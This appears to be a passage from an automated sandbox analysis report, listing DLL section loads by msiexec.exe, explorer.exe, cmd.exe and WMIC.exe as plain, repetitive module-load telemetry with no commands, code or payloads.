Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
